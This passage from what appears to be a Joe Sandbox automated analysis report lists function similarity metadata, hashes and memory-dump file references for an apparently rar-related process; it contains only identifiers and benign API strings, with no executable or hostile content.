                                                              Similarity
                                                              • API ID: InformationVolumeswprintf
                                                              • String ID: FAT$FAT32
                                                              • API String ID: 989755765-1174603449
                                                              • Opcode ID: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
                                                              • Instruction ID: 93bafe58f2e5806a3310ec7a640c2b303cf1212fb5ef24e14ca56bcfdeb7e341
                                                              • Opcode Fuzzy Hash: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
                                                              • Instruction Fuzzy Hash: 66116D21A18A8A41FF609F10EC952AF6390FBC7345F801031EA4DC6A99EF3CE504EB05
                                                              Function 00007FF629B3B974 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: ErrorExceptionLastObjectSingleThrowWait
                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                              • API String ID: 564652978-2248577382
                                                              • Opcode ID: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
                                                              • Instruction ID: 728c99a8e9d32dbeb62b89dcf658ef84697ab3e1d21996f9e42083ffc720189c
                                                              • Opcode Fuzzy Hash: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
                                                              • Instruction Fuzzy Hash: 49E07D21E1480A82EE04AB25AC8517E3251AFD7776F905331D43DC11E59F6C6546E312